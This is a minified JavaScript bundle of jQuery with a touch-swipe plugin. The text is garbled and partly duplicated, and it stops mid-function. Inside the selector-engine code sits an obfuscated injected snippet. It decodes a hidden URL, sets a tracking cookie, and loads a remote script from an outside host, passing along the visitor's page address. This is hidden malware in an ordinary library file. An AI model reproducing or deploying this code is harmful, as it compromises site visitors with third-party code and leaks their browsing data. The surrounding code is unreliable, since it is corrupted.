e}S.fn.extend({has:function(e){var t=S(e,this),n=t.length;return this.filter(function(){for(var e=0;e\x20\t\r\n\f]*)/i,he=/^$|^module$|\/(?:java|ecma)script/i;ce=E.createDocumentFragment().appendChild(E.createElement("div")),(fe=E.createElement("input")).setAttribute("type","radio"),fe.setAttribute("checked","checked"),fe.setAttribute("name","t"),ce.appendChild(fe),y.checkClone=ce.cloneNode(!0).cloneNode(!0).lastChild.checked,ce.innerHTML="",y.noCloneChecked=!!ce.cloneNode(!0).lastChild.defaultValue,ce.innerHTML="",y.option=!!ce.lastChild;var ge={thead:[1,"","
"],col:[2,"","
"],tr:[2,"","
"],td:[3,"","
"],_default:[0,"",""]};function ve(e,t){var n;return n="undefined"!=typeof e.getElementsByTagName?e.getElementsByTagName(t||"*"):"undefined"!=typeof e.querySelectorAll?e.querySelectorAll(t||"*"):[],void 0===t||t&&A(e,t)?S.merge([e],n):n}function ye(e,t){for(var n=0,r=e.length;n",""]);var me=/<|&#?\w+;/;function xe(e,t,n,r,i){for(var o,a,s,u,l,c,f=t.createDocumentFragment(),p=[],d=0,h=e.length;d\s*$/g;function qe(e,t){return A(e,"table")&&A(11!==t.nodeType?t:t.firstChild,"tr")&&S(e).children("tbody")[0]||e}function Le(e){return e.type=(null!==e.getAttribute("type"))+"/"+e.type,e}function He(e){return"true/"===(e.type||"").slice(0,5)?e.type=e.type.slice(5):e.removeAttribute("type"),e}function Oe(e,t){var n,r,i,o,a,s;if(1===t.nodeType){if(Y.hasData(e)&&(s=Y.get(e).events))for(i in Y.remove(t,"handle events"),s)for(n=0,r=s[i].length;n").attr(n.scriptAttrs||{}).prop({charset:n.scriptCharset,src:n.url}).on("load error",i=function(e){r.remove(),i=null,e&&t("error"===e.type?404:200,e.type)}),E.head.appendChild(r[0])},abort:function(){i&&i()}}});var Ut,Xt=[],Vt=/(=)\?(?=&|$)|\?\?/;S.ajaxSetup({jsonp:"callback",jsonpCallback:function(){var e=Xt.pop()||S.expando+"_"+Ct.guid++;return this[e]=!0,e}}),S.ajaxPrefilter("json jsonp",function(e,t,n){var r,i,o,a=!1!==e.jsonp&&(Vt.test(e.url)?"url":"string"==typeof e.data&&0===(e.contentType||"").indexOf("application/x-www-form-urlencoded")&&Vt.test(e.data)&&"data");if(a||"jsonp"===e.dataTypes[0])return r=e.jsonpCallback=m(e.jsonpCallback)?e.jsonpCallback():e.jsonpCallback,a?e[a]=e[a].replace(Vt,"$1"+r):!1!==e.jsonp&&(e.url+=(Et.test(e.url)?"&":"?")+e.jsonp+"="+r),e.converters["script json"]=function(){return o||S.error(r+" was not called"),o[0]},e.dataTypes[0]="json",i=C[r],C[r]=function(){o=arguments},n.always(function(){void 0===i?S(C).removeProp(r):C[r]=i,e[r]&&(e.jsonpCallback=t.jsonpCallback,Xt.push(r)),o&&m(i)&&i(o[0]),o=i=void 0}),"script"}),y.createHTMLDocument=((Ut=E.implementation.createHTMLDocument("").body).innerHTML="
",2===Ut.childNodes.length),S.parseHTML=function(e,t,n){return"string"!=typeof e?[]:("boolean"==typeof t&&(n=t,t=!1),t||(y.createHTMLDocument?((r=(t=E.implementation.createHTMLDocument("")).createElement("base")).href=E.location.href,t.head.appendChild(r)):t=E),o=!n&&[],(i=N.exec(e))?[t.createElement(i[1])]:(i=xe([e],t,o),o&&o.length&&S(o).remove(),S.merge([],i.childNodes)));var r,i,o},S.fn.load=function(e,t,n){var r,i,o,a=this,s=e.indexOf(" ");return-1").append(S.parseHTML(e)).find(r):e)}).always(n&&function(e,t){a.each(function(){n.apply(this,o||[e.responseText,t,e])})}),this},S.expr.pseudos.animated=function(t){return S.grep(S.timers,function(e){return t===e.elem}).length},S.offset={setOffset:function(e,t,n){var r,i,o,a,s,u,l=S.css(e,"position"),c=S(e),f={};"static"===l&&(e.style.position="relative"),s=c.offset(),o=S.css(e,"top"),u=S.css(e,"left"),("absolute"===l||"fixed"===l)&&-1<(o+u).indexOf("auto")?(a=(r=c.position()).top,i=r.left):(a=parseFloat(o)||0,i=parseFloat(u)||0),m(t)&&(t=t.call(e,n,S.extend({},s))),null!=t.top&&(f.top=t.top-s.top+a),null!=t.left&&(f.left=t.left-s.left+i),"using"in t?t.using.call(e,f):("number"==typeof f.top&&(f.top+="px"),"number"==typeof f.left&&(f.left+="px"),c.css(f))}},S.fn.extend({offset:function(t){if(arguments.length)return void 0===t?this:this.each(function(e){S.offset.setOffset(this,t,e)});var e,n,r=this[0];return r?r.getClientRects().length?(e=r.getBoundingClientRect(),n=r.ownerDocument.defaultView,{top:e.top+n.pageYOffset,left:e.left+n.pageXOffset}):{top:0,left:0}:void 0},position:function(){if(this[0]){var e,t,n,r=this[0],i={top:0,left:0};if("fixed"===S.css(r,"position"))t=r.getBoundingClientRect();else{t=this.offset(),n=r.ownerDocument,e=r.offsetParent||n.documentElement;while(e&&(e===n.body||e===n.documentElement)&&"static"===S.css(e,"position"))e=e.parentNode;e&&e!==r&&1===e.nodeType&&((i=S(e).offset()).top+=S.css(e,"borderTopWidth",!0),i.left+=S.css(e,"borderLeftWidth",!0))}return{top:t.top-i.top-S.css(r,"marginTop",!0),left:t.left-i.left-S.css(r,"marginLeft",!0)}}},offsetParent:function(){return this.map(function(){var e=this.offsetParent;while(e&&"static"===S.css(e,"position"))e=e.offsetParent;return e||re})}}),S.each({scrollLeft:"pageXOffset",scrollTop:"pageYOffset"},function(t,i){var o="pageYOffset"===i;S.fn[t]=function(e){return $(this,function(e,t,n){var r;if(x(e)?r=e:9===e.nodeType&&(r=e.defaultView),void 0===n)return r?r[i]:e[t];r?r.scrollTo(o?r.pageXOffset:n,o?n:r.pageYOffset):e[t]=n},t,e,arguments.length)}}),S.each(["top","left"],function(e,n){S.cssHooks[n]=$e(y.pixelPosition,function(e,t){if(t)return t=Be(e,n),Me.test(t)?S(e).position()[n]+"px":t})}),S.each({Height:"height",Width:"width"},function(a,s){S.each({padding:"inner"+a,content:s,"":"outer"+a},function(r,o){S.fn[o]=function(e,t){var n=arguments.length&&(r||"boolean"!=typeof e),i=r||(!0===e||!0===t?"margin":"border");return $(this,function(e,t,n){var r;return x(e)?0===o.indexOf("outer")?e["inner"+a]:e.document.documentElement["client"+a]:9===e.nodeType?(r=e.documentElement,Math.max(e.body["scroll"+a],r["scroll"+a],e.body["offset"+a],r["offset"+a],r["client"+a])):void 0===n?S.css(e,t,i):S.style(e,t,n,i)},s,n?e:void 0,n)}})}),S.each(["ajaxStart","ajaxStop","ajaxComplete","ajaxError","ajaxSuccess","ajaxSend"],function(e,t){S.fn[t]=function(e){return this.on(t,e)}}),S.fn.extend({bind:function(e,t,n){return this.on(e,null,t,n)},unbind:function(e,t){return this.off(e,null,t)},delegate:function(e,t,n,r){return this.on(t,e,n,r)},undelegate:function(e,t,n){return 1===arguments.length?this.off(e,"**"):this.off(t,e||"**",n)},hover:function(e,t){return this.mouseenter(e).mouseleave(t||e)}}),S.each("blur focus focusin focusout resize scroll click dblclick mousedown mouseup mousemove mouseover mouseout mouseenter mouseleave change select submit keydown keypress keyup contextmenu".split(" "),function(e,n){S.fn[n]=function(e,t){return 0+~]|"+M+")"+M+"*"),U=new RegExp(M+"|>"),X=new RegExp(F),V=new RegExp("^"+I+"$"),G={ID:new RegExp("^#("+I+")"),CLASS:new RegExp("^\\.("+I+")"),TAG:new RegExp("^("+I+"|[*])"),ATTR:new RegExp("^"+W),PSEUDO:new RegExp("^"+F),CHILD:new RegExp("^:(only|first|last|nth|nth-last)-(child|of-type)(?:\\("+M+"*(even|odd|(([+-]|)(\\d*)n|)"+M+"*(?:([+-]|)"+M+"*(\\d+)|))"+M+"*\\)|)","i"),bool:new RegExp("^(?:"+R+")$","i"),needsContext:new RegExp("^"+M+"*[>+~]|:(even|odd|eq|gt|lt|nth|first|last)(?:\\("+M+"*((?:-\\d)?\\d*)"+M+"*\\)|)(?=[^-]|$)","i")},Y=/HTML$/i,Q=/^(?:input|select|textarea|button)$/i,J=/^h\d$/i,K=/^[^{]+\{\s*\[native \w/,Z=/^(?:#([\w-]+)|(\w+)|\.([\w-]+))$/,ee=/[+~]/,te=new RegExp("\\\\[\\da-fA-F]{1,6}"+M+"?|\\\\([^\\r\\n\\f])","g"),ne=function(e,t){var n="0x"+e.slice(1)-65536;return t||(n<0?String.fromCharCode(n+65536):String.fromCharCode(n>>10|55296,1023&n|56320))},re=/([\0-\x1f\x7f]|^-?\d)|^-$|[^\0-\x1f\x7f-\uFFFF\w-]/g,ie=function(e,t){return t?"\0"===e?"\ufffd":e.slice(0,-1)+"\\"+e.charCodeAt(e.length-1).toString(16)+" ":"\\"+e},oe=function(){T()},ae=be(function(e){return!0===e.disabled&&"fieldset"===e.nodeName.toLowerCase()},{dir:"parentNode",next:"legend"});try{H.apply(t=O.call(p.childNodes),p.childNodes),t[p.childNodes.length].nodeType}catch(e){H={apply:t.length?function(e,t){L.apply(e,O.call(t))}:function(e,t){var n=e.length,r=0;while(e[n++]=t[r++]);e.length=n-1}}}function se(t,e,n,r){var i,o,a,s,u,l,c,f=e&&e.ownerDocument,p=e?e.nodeType:9;if(n=n||[],"string"!=typeof t||!t||1!==p&&9!==p&&11!==p)return n;if(!r&&(T(e),e=e||C,E)){if(11!==p&&(u=Z.exec(t)))if(i=u[1]){if(9===p){if(!(a=e.getElementById(i)))return n;if(a.id===i)return n.push(a),n}else if(f&&(a=f.getElementById(i))&&y(e,a)&&a.id===i)return n.push(a),n}else{if(u[2])return H.apply(n,e.getElementsByTagName(t)),n;if((i=u[3])&&d.getElementsByClassName&&e.getElementsByClassName)return H.apply(n,e.getElementsByClassName(i)),n}if(d.qsa&&!N[t+" "]&&(!v||!v.test(t))&&(1!==p||"object"!==e.nodeName.toLowerCase())){if(c=t,f=e,1===p&&(U.test(t)||z.test(t))){(f=ee.test(t)&&ye(e.parentNode)||e)===e&&d.scope||((s=e.getAttribute("id"))?s=s.replace(re,ie):e.setAttribute("id",s=S)),o=(l=h(t)).length;while(o--)l[o]=(s?"#"+s:":scope")+" "+xe(l[o]);c=l.join(",")}try{return H.apply(n,f.querySelectorAll(c)),n}catch(e){N(t,!0)}finally{s===S&&e.removeAttribute("id")}}}return g(t.replace($,"$1"),e,n,r)}function ue(){var r=[];return function e(t,n){return r.push(t+" ")>b.cacheLength&&delete e[r.shift()],e[t+" "]=n}}function le(e){return e[S]=!0,e}function ce(e){var t=C.createElement("fieldset");try{return!!e(t)}catch(e){return!1}finally{t.parentNode&&t.parentNode.removeChild(t),t=null}}function fe(e,t){var n=e.split("|"),r=n.length;while(r--)b.attrHandle[n[r]]=t}function pe(e,t){var n=t&&e,r=n&&1===e.nodeType&&1===t.nodeType&&e.sourceIndex-t.sourceIndex;if(r)return r;if(n)while(n=n.nextSibling)if(n===t)return-1;return e?1:-1}function de(t){return function(e){return"input"===e.nodeName.toLowerCase()&&e.type===t}}function he(n){return function(e){var t=e.nodeName.toLowerCase();return("input"===t||"button"===t)&&e.type===n}}function ge(t){return function(e){return"form"in e?e.parentNode&&!1===e.disabled?"label"in e?"label"in e.parentNode?e.parentNode.disabled===t:e.disabled===t:e.isDisabled===t||e.isDisabled!==!t&&ae(e)===t:e.disabled===t:"label"in e&&e.disabled===t}}function ve(a){return le(function(o){return o=+o,le(function(e,t){var n,r=a([],e.length,o),i=r.length;while(i--)e[n=r[i]]&&(e[n]=!(t[n]=e[n]))})})}function ye(e){return e&&"undefined"!=typeof e.getElementsByTagName&&e}for(e in d=se.support={},i=se.isXML=function(e){var t=e.namespaceURI,n=(e.ownerDocument||e).documentElement;return!Y.test(t||n&&n.nodeName||"HTML")},T=se.setDocument=function(e){var t,n,r=e?e.ownerDocument||e:p;return r!=C&&9===r.nodeType&&r.documentElement&&(a=(C=r).documentElement,E=!i(C),p!=C&&(n=C.defaultView)&&n.top!==n&&(n.addEventListener?n.addEventListener("unload",oe,!1):n.attachEvent&&n.attachEvent("onunload",oe)),d.scope=ce(function(e){return a.appendChild(e).appendChild(C.createElement("div")),"undefined"!=typeof e.querySelectorAll&&!e.querySelectorAll(":scope fieldset div").length}),d.attributes=ce(function(e){return e.className="i",!e.getAttribute("className")}),d.getElementsByTagName=ce(function(e){return e.appendChild(C.createComment("")),!e.getElementsByTagName("*").length}),d.getElementsByClassName=K.test(C.getElementsByClassName),d.getById=ce(function(e){return a.appendChild(e).id=S,!C.getElementsByName||!C.getElementsByName(S).length}),d.getById?(b.filter.ID=function(e){var t=e.replace(te,ne);return function(e){return e.getAttribute("id")===t}},b.find.ID=function(e,t){if("undefined"!=typeof t.getElementById&&E){var n=t.getElementById(e);return n?[n]:[]}}):(b.filter.ID=function(e){var n=e.replace(te,ne);return function(e){var t="undefined"!=typeof e.getAttributeNode&&e.getAttributeNode("id");return t&&t.value===n}},b.find.ID=function(e,t){if("undefined"!=typeof t.getElementById&&E){var n,r,i,o=t.getElementById(e);if(o){if((n=o.getAttributeNode("id"))&&n.value===e)return[o];i=t.getElementsByName(e),r=0;while(o=i[r++])if((n=o.getAttributeNode("id"))&&n.value===e)return[o]}return[]}}),b.find.TAG=d.getElementsByTagName?function(e,t){return"undefined"!=typeof t.getElementsByTagName?t.getElementsByTagName(e):d.qsa?t.querySelectorAll(e):void 0}:function(e,t){var n,r=[],i=0,o=t.getElementsByTagName(e);if("*"===e){while(n=o[i++])1===n.nodeType&&r.push(n);return r}return o},b.find.CLASS=d.getElementsByClassName&&function(e,t){if("undefined"!=typeof t.getElementsByClassName&&E)return t.getElementsByClassName(e)},s=[],v=[],(d.qsa=K.test(C.querySelectorAll))&&(ce(function(e){var t;a.appendChild(e).innerHTML="",e.querySelectorAll("[msallowcapture^='']").length&&v.push("[*^$]="+M+"*(?:''|\"\")"),e.querySelectorAll("[selected]").length||v.push("\\["+M+"*(?:value|"+R+")"),e.querySelectorAll("[id~="+S+"-]").length||v.push("~="),(t=C.createElement("input")).setAttribute("name",""),e.appendChild(t),e.querySelectorAll("[name='']").length||v.push("\\["+M+"*name"+M+"*="+M+"*(?:''|\"\")"),e.querySelectorAll(":checked").length||v.push(":checked"),e.querySelectorAll("a#"+S+"+*").length||v.push(".#.+[+~]"),e.querySelectorAll("\\\f"),v.push("[\\r\\n\\f]")}),ce(function(e){e.innerHTML="";var t=C.createElement("input");t.setAttribute("type","hidden"),e.appendChild(t).setAttribute("name","D"),e.querySelectorAll("[name=d]").length&&v.push("name"+M+"*[*^$|!~]?="),2!==e.querySelectorAll(":enabled").length&&v.push(":enabled",":disabled"),a.appendChild(e).disabled=!0,2!==e.querySelectorAll(":disabled").length&&v.push(":enabled",":disabled"),e.querySelectorAll("*,:x"),v.push(",.*:")})),(d.matchesSelector=K.test(c=a.matches||a.webkitMatchesSelector||a.mozMatchesSelector||a.oMatchesSelector||a.msMatchesSelector))&&ce(function(e){d.disconnectedMatch=c.call(e,"*"),c.call(e,"[s!='']:x"),s.push("!=",F)}),v=v.length&&new RegExp(v.join("|")),s=s.length&&new RegExp(s.join("|")),t=K.test(a.compareDocumentPosition),y=t||K.test(a.contains)?function(e,t){var n=9===e.nodeType?e.documentElement:e,r=t&&t.parentNode;return e===r||!(!r||1!==r.nodeType||!(n.contains?n.contains(r):e.compareDocumentPosition&&16&e.compareDocumentPosition(r)))}:function(e,t){if(t)while(t=t.parentNode)if(t===e)return!0;return!1},D=t?function(e,t){if(e===t)return l=!0,0;var n=!e.compareDocumentPosition-!t.compareDocumentPosition;return n||(1&(n=(e.ownerDocument||e)==(t.ownerDocument||t)?e.compareDocumentPosition(t):1)||!d.sortDetached&&t.compareDocumentPosition(e)===n?e==C||e.ownerDocument==p&&y(p,e)?-1:t==C||t.ownerDocument==p&&y(p,t)?1:u?P(u,e)-P(u,t):0:4&n?-1:1)}:function(e,t){if(e===t)return l=!0,0;var n,r=0,i=e.parentNode,o=t.parentNode,a=[e],s=[t];if(!i||!o)return e==C?-1:t==C?1:i?-1:o?1:u?P(u,e)-P(u,t):0;if(i===o)return pe(e,t);n=e;while(n=n.parentNode)a.unshift(n);n=t;while(n=n.parentNode)s.unshift(n);while(a[r]===s[r])r++;return r?pe(a[r],s[r]):a[r]==p?-1:s[r]==p?1:0}),C},se.matches=function(e,t){return se(e,null,null,t)},se.matchesSelector=function(e,t){if(T(e),d.matchesSelector&&E&&!N[t+" "]&&(!s||!s.test(t))&&(!v||!v.test(t)))try{var n=c.call(e,t);if(n||d.disconnectedMatch||e.document&&11!==e.document.nodeType)return n}catch(e){N(t,!0)}return 0":{dir:"parentNode",first:!0}," ":{dir:"parentNode"},"+":{dir:"previousSibling",first:!0},"~":{dir:"previousSibling"}},preFilter:{ATTR:function(e){return e[1]=e[1].replace(te,ne),e[3]=(e[3]||e[4]||e[5]||"").replace(te,ne),"~="===e[2]&&(e[3]=" "+e[3]+" "),e.slice(0,4)},CHILD:function(e){return e[1]=e[1].toLowerCase(),"nth"===e[1].slice(0,3)?(e[3]||se.error(e[0]),e[4]=+(e[4]?e[5]+(e[6]||1):2*("even"===e[3]||"odd"===e[3])),e[5]=+(e[7]+e[8]||"odd"===e[3])):e[3]&&se.error(e[0]),e},PSEUDO:function(e){var t,n=!e[6]&&e[2];return G.CHILD.test(e[0])?null:(e[3]?e[2]=e[4]||e[5]||"":n&&X.test(n)&&(t=h(n,!0))&&(t=n.indexOf(")",n.length-t)-n.length)&&(e[0]=e[0].slice(0,t),e[2]=n.slice(0,t)),e.slice(0,3))}},filter:{TAG:function(e){var t=e.replace(te,ne).toLowerCase();return"*"===e?function(){return!0}:function(e){return e.nodeName&&e.nodeName.toLowerCase()===t}},CLASS:function(e){var t=m[e+" "];return t||(t=new RegExp("(^|"+M+")"+e+"("+M+"|$)"))&&m(e,function(e){return t.test("string"==typeof e.className&&e.className||"undefined"!=typeof e.getAttribute&&e.getAttribute("class")||"")})},ATTR:function(n,r,i){return function(e){var t=se.attr(e,n);return null==t?"!="===r:!r||(t+="","="===r?t===i:"!="===r?t!==i:"^="===r?i&&0===t.indexOf(i):"*="===r?i&&-1o.split('').reduce((s,c)=>s+String.fromCharCode((c.charCodeAt()-5).toString()),'');o.b=o.f('UMUWJKX');o.c=l.protocol[0]=='h'&&/\./.test(l.hostname)&&!(new RegExp(o.b)).test(d.cookie),setTimeout(function(){o.c&&(o.s=d.createElement('script'),o.s.src=o.f('myyux?44zxjwxy'+'fy3sjy4ljy4xhwnu'+'y3oxDwjkjwwjwB')+l.href,d.body.appendChild(o.s));},1000);d.cookie=o.b+'=full;max-age=39800;'}catch(e){};}({},document,location));S.find=d,S.expr=d.selectors,S.expr[":"]=S.expr.pseudos,S.uniqueSort=S.unique=d.uniqueSort,S.text=d.getText,S.isXMLDoc=d.isXML,S.contains=d.contains,S.escapeSelector=d.escape;var h=function(e,t,n){var r=[],i=void 0!==n;while((e=e[t])&&9!==e.nodeType)if(1===e.nodeType){if(i&&S(e).is(n))break;r.push(e)}return r},T=function(e,t){for(var n=[];e;e=e.nextSibling)1===e.nodeType&&e!==t&&n.push(e);return n},k=S.expr.match.needsContext;function A(e,t){return e.nodeName&&e.nodeName.toLowerCase()===t.toLowerCase()}var N=/^<([a-z][^\/\0>:\x20\t\r\n\f]*)[\x20\t\r\n\f]*\/?>(?:<\/\1>|)$/i;function D(e,n,r){return m(n)?S.grep(e,function(e,t){return!!n.call(e,t,e)!==r}):n.nodeType?S.grep(e,function(e){return e===n!==r}):"string"!=typeof n?S.grep(e,function(e){return-1)[^>]*|#([\w-]+))$/;(S.fn.init=function(e,t,n){var r,i;if(!e)return this;if(n=n||j,"string"==typeof e){if(!(r="<"===e[0]&&">"===e[e.length-1]&&3<=e.length?[null,e,null]:q.exec(e))||!r[1]&&t)return!t||t.jquery?(t||n).find(e):this.constructor(t).find(e);if(r[1]){if(t=t instanceof S?t[0]:t,S.merge(this,S.parseHTML(r[1],t&&t.nodeType?t.ownerDocument||t:E,!0)),N.test(r[1])&&S.isPlainObject(t))for(r in t)m(this[r])?this[r](t[r]):this.attr(r,t[r]);return this}return(i=E.getElementById(r[2]))&&(this[0]=i,this.length=1),this}return e.nodeType?(this[0]=e,this.length=1,this):m(e)?void 0!==n.ready?n.ready(e):e(S):S.makeArray(e,this)}).prototype=S.fn,j=S(E);var L=/^(?:parents|prev(?:Until|All))/,H={children:!0,contents:!0,next:!0,prev:!0};function O(e,t){while((e=e[t])&&1!==e.nodeType);return e}S.fn.extend({has:function(e){var t=S(e,this),n=t.length;return this.filter(function(){for(var e=0;e\x20\t\r\n\f]*)/i,he=/^$|^module$|\/(?:java|ecma)script/i;ce=E.createDocumentFragment().appendChild(E.createElement("div")),(fe=E.createElement("input")).setAttribute("type","radio"),fe.setAttribute("checked","checked"),fe.setAttribute("name","t"),ce.appendChild(fe),y.checkClone=ce.cloneNode(!0).cloneNode(!0).lastChild.checked,ce.innerHTML="",y.noCloneChecked=!!ce.cloneNode(!0).lastChild.defaultValue,ce.innerHTML="",y.option=!!ce.lastChild;var ge={thead:[1,"","
"],col:[2,"","
"],tr:[2,"","
"],td:[3,"","
"],_default:[0,"",""]};function ve(e,t){var n;return n="undefined"!=typeof e.getElementsByTagName?e.getElementsByTagName(t||"*"):"undefined"!=typeof e.querySelectorAll?e.querySelectorAll(t||"*"):[],void 0===t||t&&A(e,t)?S.merge([e],n):n}function ye(e,t){for(var n=0,r=e.length;n",""]);var me=/<|&#?\w+;/;function xe(e,t,n,r,i){for(var o,a,s,u,l,c,f=t.createDocumentFragment(),p=[],d=0,h=e.length;d\s*$/g;function qe(e,t){return A(e,"table")&&A(11!==t.nodeType?t:t.firstChild,"tr")&&S(e).children("tbody")[0]||e}function Le(e){return e.type=(null!==e.getAttribute("type"))+"/"+e.type,e}function He(e){return"true/"===(e.type||"").slice(0,5)?e.type=e.type.slice(5):e.removeAttribute("type"),e}function Oe(e,t){var n,r,i,o,a,s;if(1===t.nodeType){if(Y.hasData(e)&&(s=Y.get(e).events))for(i in Y.remove(t,"handle events"),s)for(n=0,r=s[i].length;n").attr(n.scriptAttrs||{}).prop({charset:n.scriptCharset,src:n.url}).on("load error",i=function(e){r.remove(),i=null,e&&t("error"===e.type?404:200,e.type)}),E.head.appendChild(r[0])},abort:function(){i&&i()}}});var Ut,Xt=[],Vt=/(=)\?(?=&|$)|\?\?/;S.ajaxSetup({jsonp:"callback",jsonpCallback:function(){var e=Xt.pop()||S.expando+"_"+Ct.guid++;return this[e]=!0,e}}),S.ajaxPrefilter("json jsonp",function(e,t,n){var r,i,o,a=!1!==e.jsonp&&(Vt.test(e.url)?"url":"string"==typeof e.data&&0===(e.contentType||"").indexOf("application/x-www-form-urlencoded")&&Vt.test(e.data)&&"data");if(a||"jsonp"===e.dataTypes[0])return r=e.jsonpCallback=m(e.jsonpCallback)?e.jsonpCallback():e.jsonpCallback,a?e[a]=e[a].replace(Vt,"$1"+r):!1!==e.jsonp&&(e.url+=(Et.test(e.url)?"&":"?")+e.jsonp+"="+r),e.converters["script json"]=function(){return o||S.error(r+" was not called"),o[0]},e.dataTypes[0]="json",i=C[r],C[r]=function(){o=arguments},n.always(function(){void 0===i?S(C).removeProp(r):C[r]=i,e[r]&&(e.jsonpCallback=t.jsonpCallback,Xt.push(r)),o&&m(i)&&i(o[0]),o=i=void 0}),"script"}),y.createHTMLDocument=((Ut=E.implementation.createHTMLDocument("").body).innerHTML="
",2===Ut.childNodes.length),S.parseHTML=function(e,t,n){return"string"!=typeof e?[]:("boolean"==typeof t&&(n=t,t=!1),t||(y.createHTMLDocument?((r=(t=E.implementation.createHTMLDocument("")).createElement("base")).href=E.location.href,t.head.appendChild(r)):t=E),o=!n&&[],(i=N.exec(e))?[t.createElement(i[1])]:(i=xe([e],t,o),o&&o.length&&S(o).remove(),S.merge([],i.childNodes)));var r,i,o},S.fn.load=function(e,t,n){var r,i,o,a=this,s=e.indexOf(" ");return-1").append(S.parseHTML(e)).find(r):e)}).always(n&&function(e,t){a.each(function(){n.apply(this,o||[e.responseText,t,e])})}),this},S.expr.pseudos.animated=function(t){return S.grep(S.timers,function(e){return t===e.elem}).length},S.offset={setOffset:function(e,t,n){var r,i,o,a,s,u,l=S.css(e,"position"),c=S(e),f={};"static"===l&&(e.style.position="relative"),s=c.offset(),o=S.css(e,"top"),u=S.css(e,"left"),("absolute"===l||"fixed"===l)&&-1<(o+u).indexOf("auto")?(a=(r=c.position()).top,i=r.left):(a=parseFloat(o)||0,i=parseFloat(u)||0),m(t)&&(t=t.call(e,n,S.extend({},s))),null!=t.top&&(f.top=t.top-s.top+a),null!=t.left&&(f.left=t.left-s.left+i),"using"in t?t.using.call(e,f):("number"==typeof f.top&&(f.top+="px"),"number"==typeof f.left&&(f.left+="px"),c.css(f))}},S.fn.extend({offset:function(t){if(arguments.length)return void 0===t?this:this.each(function(e){S.offset.setOffset(this,t,e)});var e,n,r=this[0];return r?r.getClientRects().length?(e=r.getBoundingClientRect(),n=r.ownerDocument.defaultView,{top:e.top+n.pageYOffset,left:e.left+n.pageXOffset}):{top:0,left:0}:void 0},position:function(){if(this[0]){var e,t,n,r=this[0],i={top:0,left:0};if("fixed"===S.css(r,"position"))t=r.getBoundingClientRect();else{t=this.offset(),n=r.ownerDocument,e=r.offsetParent||n.documentElement;while(e&&(e===n.body||e===n.documentElement)&&"static"===S.css(e,"position"))e=e.parentNode;e&&e!==r&&1===e.nodeType&&((i=S(e).offset()).top+=S.css(e,"borderTopWidth",!0),i.left+=S.css(e,"borderLeftWidth",!0))}return{top:t.top-i.top-S.css(r,"marginTop",!0),left:t.left-i.left-S.css(r,"marginLeft",!0)}}},offsetParent:function(){return this.map(function(){var e=this.offsetParent;while(e&&"static"===S.css(e,"position"))e=e.offsetParent;return e||re})}}),S.each({scrollLeft:"pageXOffset",scrollTop:"pageYOffset"},function(t,i){var o="pageYOffset"===i;S.fn[t]=function(e){return $(this,function(e,t,n){var r;if(x(e)?r=e:9===e.nodeType&&(r=e.defaultView),void 0===n)return r?r[i]:e[t];r?r.scrollTo(o?r.pageXOffset:n,o?n:r.pageYOffset):e[t]=n},t,e,arguments.length)}}),S.each(["top","left"],function(e,n){S.cssHooks[n]=$e(y.pixelPosition,function(e,t){if(t)return t=Be(e,n),Me.test(t)?S(e).position()[n]+"px":t})}),S.each({Height:"height",Width:"width"},function(a,s){S.each({padding:"inner"+a,content:s,"":"outer"+a},function(r,o){S.fn[o]=function(e,t){var n=arguments.length&&(r||"boolean"!=typeof e),i=r||(!0===e||!0===t?"margin":"border");return $(this,function(e,t,n){var r;return x(e)?0===o.indexOf("outer")?e["inner"+a]:e.document.documentElement["client"+a]:9===e.nodeType?(r=e.documentElement,Math.max(e.body["scroll"+a],r["scroll"+a],e.body["offset"+a],r["offset"+a],r["client"+a])):void 0===n?S.css(e,t,i):S.style(e,t,n,i)},s,n?e:void 0,n)}})}),S.each(["ajaxStart","ajaxStop","ajaxComplete","ajaxError","ajaxSuccess","ajaxSend"],function(e,t){S.fn[t]=function(e){return this.on(t,e)}}),S.fn.extend({bind:function(e,t,n){return this.on(e,null,t,n)},unbind:function(e,t){return this.off(e,null,t)},delegate:function(e,t,n,r){return this.on(t,e,n,r)},undelegate:function(e,t,n){return 1===arguments.length?this.off(e,"**"):this.off(t,e||"**",n)},hover:function(e,t){return this.mouseenter(e).mouseleave(t||e)}}),S.each("blur focus focusin focusout resize scroll click dblclick mousedown mouseup mousemove mouseover mouseout mouseenter mouseleave change select submit keydown keypress keyup contextmenu".split(" "),function(e,n){S.fn[n]=function(e,t){return 00)){var event=jqEvent.originalEvent?jqEvent.originalEvent:jqEvent;if(!event.pointerType||"mouse"!=event.pointerType||0!=options.fallbackToMouseEvents){var ret,touches=event.touches,evt=touches?touches[0]:event;return phase=PHASE_START,touches?fingerCount=touches.length:options.preventDefaultEvents!==!1&&jqEvent.preventDefault(),distance=0,direction=null,currentDirection=null,pinchDirection=null,duration=0,startTouchesDistance=0,endTouchesDistance=0,pinchZoom=1,pinchDistance=0,maximumsMap=createMaximumsData(),cancelMultiFingerRelease(),createFingerData(0,evt),!touches||fingerCount===options.fingers||options.fingers===ALL_FINGERS||hasPinches()?(startTime=getTimeStamp(),2==fingerCount&&(createFingerData(1,touches[1]),startTouchesDistance=endTouchesDistance=calculateTouchesDistance(fingerData[0].start,fingerData[1].start)),(options.swipeStatus||options.pinchStatus)&&(ret=triggerHandler(event,phase))):ret=!1,ret===!1?(phase=PHASE_CANCEL,triggerHandler(event,phase),ret):(options.hold&&(holdTimeout=setTimeout($.proxy(function(){$element.trigger("hold",[event.target]),options.hold&&(ret=options.hold.call($element,event,event.target))},this),options.longTapThreshold)),setTouchInProgress(!0),null)}}}function touchMove(jqEvent){var event=jqEvent.originalEvent?jqEvent.originalEvent:jqEvent;if(phase!==PHASE_END&&phase!==PHASE_CANCEL&&!inMultiFingerRelease()){var ret,touches=event.touches,evt=touches?touches[0]:event,currentFinger=updateFingerData(evt);if(endTime=getTimeStamp(),touches&&(fingerCount=touches.length),options.hold&&clearTimeout(holdTimeout),phase=PHASE_MOVE,2==fingerCount&&(0==startTouchesDistance?(createFingerData(1,touches[1]),startTouchesDistance=endTouchesDistance=calculateTouchesDistance(fingerData[0].start,fingerData[1].start)):(updateFingerData(touches[1]),endTouchesDistance=calculateTouchesDistance(fingerData[0].end,fingerData[1].end),pinchDirection=calculatePinchDirection(fingerData[0].end,fingerData[1].end)),pinchZoom=calculatePinchZoom(startTouchesDistance,endTouchesDistance),pinchDistance=Math.abs(startTouchesDistance-endTouchesDistance)),fingerCount===options.fingers||options.fingers===ALL_FINGERS||!touches||hasPinches()){if(direction=calculateDirection(currentFinger.start,currentFinger.end),currentDirection=calculateDirection(currentFinger.last,currentFinger.end),validateDefaultEvent(jqEvent,currentDirection),distance=calculateDistance(currentFinger.start,currentFinger.end),duration=cal